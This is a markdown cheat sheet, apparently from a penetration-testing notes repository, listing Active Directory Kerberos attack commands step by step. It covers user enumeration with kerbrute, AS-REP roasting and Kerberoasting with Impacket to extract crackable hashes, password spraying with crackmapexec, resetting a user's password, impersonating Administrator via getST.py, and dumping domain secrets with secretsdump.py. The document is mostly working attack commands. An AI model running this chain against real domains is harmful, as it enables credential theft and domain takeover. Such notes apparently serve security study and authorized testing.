killchain-compendium/enumeration/docs/kerberoast.md

56 lines
1.2 KiB
Markdown
Raw Normal View History

2022-01-09 22:52:39 +01:00
# Kerberoast
## Usage
2022-03-19 23:39:17 +01:00
### List users
```sh
kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST
```
### Get Users
2022-01-09 22:52:39 +01:00
* Impacket's `GetNPUsers.py` to get Hashes of userlist
```sh
GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes
```
2022-03-19 23:39:17 +01:00
### Find SPNs
```sh
GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
or
```sh
pyverview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>
```
### Further Intel
```sh
findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
### Check Found Users
* Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
2022-01-09 22:52:39 +01:00
```sh
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
```
* Watch out for `STATUS_PASSWORD_MUST_CHANGE`
* Change password with
```sh
smbpasswd.py <user>@$TARGET_IP -newpass password123
```
2022-03-19 23:39:17 +01:00
### Impersonate
```sh
getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
```
* Serviceticket is save as `Administrator.ccache`
* `export KRB5CCNAME=Administrator.ccache`
* After that dump secrets
```sh
secretsdump.py -k -no-pass <DOMAIN>
```
2022-01-09 22:52:39 +01:00